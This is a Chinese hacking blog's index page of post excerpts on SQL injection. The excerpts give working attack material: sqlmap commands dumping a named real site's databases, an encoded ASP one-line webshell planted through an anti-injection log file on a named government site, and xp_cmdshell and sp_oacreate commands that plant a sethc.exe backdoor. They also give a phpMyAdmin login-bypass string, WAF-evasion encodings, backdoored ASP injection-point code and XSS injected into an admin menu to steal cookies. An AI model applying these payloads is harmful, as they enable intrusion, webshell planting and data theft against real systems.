文章分类 -  注入

access和mysql4注入小技巧
摘要:技巧使用时间:知道“表名”但是猜不到“列名”的时候前几天看了文章:http://www.91ri.org/11120.html,这里提到了access的注入小技巧,如果看懂了~大家就忽略前半篇吧~~然后今天想想,mysql4是没有information_schema的,也就是说表名和列名和acces... 阅读全文

posted @ 2014-11-09 12:51 =_=! 阅读(228) 评论(0) 推荐(0)

SQLMAP参数中文解说
摘要:Options(选项):--version 显示程序的版本号并退出-h, --help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为1)Target(目标):以下至少需要设置其中一个选项,设置目标URL。-d DIRECT 直接连接到数据库。-u URL, --url=URL 目标URL。-l LIST 从Burp或WebScarab代理的日志中解析目标。-r REQUESTFILE 从一个文件中载入HTTP请求。-g GOOGLEDORK 处理Google dork的结果作为目标URL。-c CONFIGFILE 从INI配置文件中加载选项。Request(请求):这些 阅读全文

posted @ 2014-01-20 04:01 =_=! 阅读(221) 评论(0) 推荐(0)

如何使用SQLMap绕过WAF
摘要:WAF(web应用防火墙)逐渐成为安全解决方案的标配之一。正因为有了它,许多公司甚至已经不在意web应用的漏洞。遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs。svn下载最新版本的sqlmapsvn checkouthttps://svn.sqlmap.org/sqlmap/trunk/sqlmapsqlmap-dev我们关注的重点在于使用tamper脚本修改请求从而逃避WAF的规则检测。许多时候,你需要联合使用多个tamper脚本。所有tamper脚本请参考:https://svn.sqlmap.org/sqlmap/trun 阅读全文

posted @ 2013-09-17 06:50 =_=! 阅读(551) 评论(0) 推荐(0)

当 sql injection 遇上 xss
摘要:(本文xss 平台地址 http://code.google.com/p/xssing/ )当注入无法获取后台地址和解密不了hash可以用这招,前提是注入点能够 update 或者 insert 数据,直接插入 xss代码(不会有任何过滤) 到后台有可能显示的地方,比如留言 消息 文章等等一个 case:目标站找到个隐蔽的 mssql盲注,但是找不到后台地址win下乱码 换到bt来,找了好久没找到留言板 却找到个极品的地方,这个系统的菜单全部是放在库里面的果断插入菜单第二天起来 成功 收到信息,直接cookie进后台,爆菊xss利用的一个小tips 各种大牛勿喷哈 阅读全文

posted @ 2013-09-17 06:14 =_=! 阅读(200) 评论(0) 推荐(0)

SQLMAP注入拖库过程
摘要:SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。渗透开始-->注入点:"http://so.126disk.com/search?key=A"测试环境:BackTrack5/SQLMAP0.9#>./sqlmap.py-u"http://so.126disk.com/search?key=A"-v1--dbs//列举数据库-->126disk,information_schema# 阅读全文

posted @ 2013-09-17 05:28 =_=! 阅读(1691) 评论(1) 推荐(1)

韩国gnuboard 4.32.11 之前版本注入0day
摘要:韩国的一款流行的论坛程序gnuboard,以前有研究过,不过未搞出什么洞出来,前两天帮朋友搞看韩国站的时候目标站下面就用了 gnuboard版本是4.31.07的。版本比较低,记得以前国内貌似有公布过这个程序的注入,但当时搞的时候没有找到相关文献,于是对应目标版本去 官网下了源码自己研究了两天,终于搞了个cookie注入出来,而且不受GPC的影响。不过这个漏洞利用范围 不大,只针对4.32.11之前的版本,而且利用起来还有一定的局限,虽然不受GPC影响,但是注入要依赖mysql报错信息,韩国大部分的mysql版 本都比较低。这就使得我在测试的时候本地正常爆出字段内容,应用到实战的时候相同的语句 阅读全文

posted @ 2012-10-13 03:12 =_=! 阅读(858) 评论(0) 推荐(0)

mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法
摘要:mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种:1、替换shift文件(在开启3389情况下):下面两条语句为分别执行的。这条语句将explorer.exe复制为sethc.exedeclare @o int exec sp_oacreate 阅读全文

posted @ 2012-09-20 01:06 =_=! 阅读(1645) 评论(0) 推荐(0)

SQL通用防注入系统asp版 插一句话漏洞利用
摘要:今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp既然做了记录,再查看了下它的记录文件于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的.┼攠數畣整爠煥敵瑳∨≡┩愾 密码 a (加密方式是: ANSI->Unicode)提交 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾http://www.baidu.com/sqlin.asp 菜刀连接之,成功 阅读全文

posted @ 2012-08-06 04:34 =_=! 阅读(763) 评论(0) 推荐(0)

直接给asp防注入getwebshell
摘要:这些网站都用的通用防注入系统有个别网站的目录存在sqlin.asp保存注入记录 可以写入一句话木马比如http://pzzl.gov.cn/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾可在http://pzzl.gov.cn/sqlin.asp写入一句话,密码a连接上去可以看到另外的几个政府网站 阅读全文

posted @ 2012-07-13 11:44 =_=! 阅读(369) 评论(2) 推荐(0)

phpmyadmin万能密码
摘要:进入phpmyadmin 登录口填'localhost'@'@'' 阅读全文

posted @ 2012-04-21 02:43 =_=! 阅读(426) 评论(0) 推荐(0)

详解搜索注入 手工注入
摘要:现在的网络,脚本入侵十分的流行,而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜,都会为它那巨大的威力和灵活多变的招式所着迷! 正是因为注入攻击的流行,使的市面上的注入工具层出不穷!比较出名的有小竹的NBSI、教主的HDSI和啊D的注入工具等等!这大大方便的小菜们掌握注入 漏洞!可是,工具是死的,注入的手法却是活的,能否根据实际情况灵活地构造SQL注入语句,得到自己想要的信息,是[被屏蔽的不受欢迎关键词]高shou 与小菜的根本区别!只用工具,而不去管它的原理,是不可能得到提高的,当然,在遇到一些特殊情况的时候,那些只会用工具的小菜们也只能放弃了!所以学会手 工注入自己构造SQL注入语 阅读全文

posted @ 2012-01-20 02:20 =_=! 阅读(919) 评论(0) 推荐(1)

构造注入点后门代码
摘要:/**************************Mssql***********************/<!–#include file="conn.asp"–><%hid=request.QueryString("id")sql="select * from admin where id="&hidset rs=conn.execute (sql)%>/**************************Access***********************/<%db="a 阅读全文

posted @ 2011-12-13 12:04 =_=! 阅读(258) 评论(0) 推荐(0)

关于mssql数据库下的一些注入技巧
摘要:小弟刚来,发点小文章给各位看官养养眼吧,都是平时渗透测试时的一些思路总结。见笑了 Sql的注射最早源于’or’1’=’1) 最重要的表名: select * from sysobjectswww.t00ls.net$ y/ _8 j5 Y0 L( Q+ Y# M sysobjects ncsysobjects sysindexes tsysindexeswww.t00ls.net7 _4 u) d' E$ k$ g& m* J syscolumns systypes3 `3 d* n9 k# D$ C* S. o& K sysusers sysdatabases3 @* 阅读全文

posted @ 2011-06-29 15:27 =_=! 阅读(279) 评论(0) 推荐(0)

另类找注入点技巧
摘要:一般的注入点像我这种菜鸟都会用以下方式1:手工测试下2:用明小子或者阿D直接浏览页面找注入点3:通过搜索引擎site:xxx.com inurl:php or asp 之类的4:safe3 jsky之类的工具抓取连接后工具自动判断~~~方式1缺点:只能测试部分页面拉,有点看运气的感觉方式2缺点:基本和第一个的缺点差不多,不全面,只能浏览部分页面方式3缺点:搜索引擎收录有限哈,有些站甚至还没收录方式4缺点:所说是模拟抓取页面链接,在检测,可实际上每次都那么早结束了,爬不完全站,有些站点还限制了这类软件爬行今天给的思路是:方案1:1:自己本地架设个搜索引擎,蜘蛛的名字命名为“Baiduspider 阅读全文

posted @ 2011-06-23 00:08 =_=! 阅读(440) 评论(0) 推荐(0)

解决注入工具无法提取关键字
摘要:SQL注入估计在大家眼里已经是老生常谈了,好像就那么回事,其实不然,在Pangolin开发过程中,我遇到过太多太多的特例以及继续深入注入的方法。这里跟大家讲讲关于资源ID不存在情况下的注入方法。什么叫“不存在资源ID”呢?举个例子,假设url为http://www.91ri.org/news.php?id=9999999,而对应9999999的资源其实是不存在的。这个情况下,使用传统的sql注入工具是没法判断注入点的(当然Pangolin是可以注入滴),更不用说提取数据了。很多情况下,互联网中存在大量的这种漏洞就被测试人员和开发人员漏掉了。也许您会想问,这种情况应该基本不存在才对?好吧,我列举 阅读全文

posted @ 2011-05-23 11:03 =_=! 阅读(343) 评论(0) 推荐(0)

防注入绕过必用11招
摘要:1、运用编码技术绕过如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)2、通过空格绕过如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or'' swords'' =‘swords'',由于mssql的松散性,我们可以把or ''swords'' 之间的空格去掉,并不影响运行。3、运用字符串判断代替用经典的or 1=1判断绕过,如or ''sw 阅读全文

posted @ 2011-05-19 17:37 =_=! 阅读(207) 评论(0) 推荐(0)

修改limit的值进行注入
摘要:话说某脱裤的黑客被一个注入点弄得蛋疼了,详情请见 http://t00ls.net/thread-14032-1-1.html。 在t00ls发了个帖子,对于这些过滤啥,防火墙啥的,小菜我不懂啊,咱准备等其他黑客回答,然后学习学习,突然我帖子里看到精逼两个字,小菜我眼睛都直了,于是不自量力来折腾折腾.话说咱菜啊,咱碰到注入点没啥办法,咱能力不行,咱就用工具,正如某岛国爱情动作片里一下,拿起工具,干之,于是就掏出了穿山甲,看看是否能射进去。咱用起穿山甲,咱就sb了,明明是个点,啥都跑不出来哇。咱思考思考。稍微手工了一下,咱就明白了这就明白了吧换季的时候皮肤管理这就是关键字, 于是我在穿山甲的关键 阅读全文

posted @ 2011-05-12 01:13 =_=! 阅读(479) 评论(0) 推荐(0)

SQL注入不能多句执行时的一种突破方法(SA权限)
摘要:有时候会遇到SA权限不能多句执行的情况,让人很蛋疼。前几天在搞一个SQL SERVER 7.0的PUBLIC权限时。某牛给我以下语句提权select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdshell ''dir c:''')本机测试成功。但实际环境中却出现[微软] [ODBC SQL Server驱动] [SQL Server中] OLE DB提 阅读全文

posted @ 2011-05-12 00:10 =_=! 阅读(346) 评论(0) 推荐(0)

SQL高级注入使用之储存过程
摘要:sql2005恢复xp_cmdshellEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;关闭:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;零、----------------- 添加SA用户----------- 阅读全文

posted @ 2011-05-11 23:45 =_=! 阅读(433) 评论(0) 推荐(0)

高级PHP手工注入
摘要:1.判断版本http://www.7747.net/document/advisory/detail.php?id=7and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解http://www.7747.net/document/advisory/detail.php?id=7and 2=4 union select 1,2,3,4,5,6,7,8,9--3.查看数据库版本及当前用户,http://www.7747.net/document 阅读全文

posted @ 2011-05-09 01:05 =_=! 阅读(475) 评论(0) 推荐(0)

导航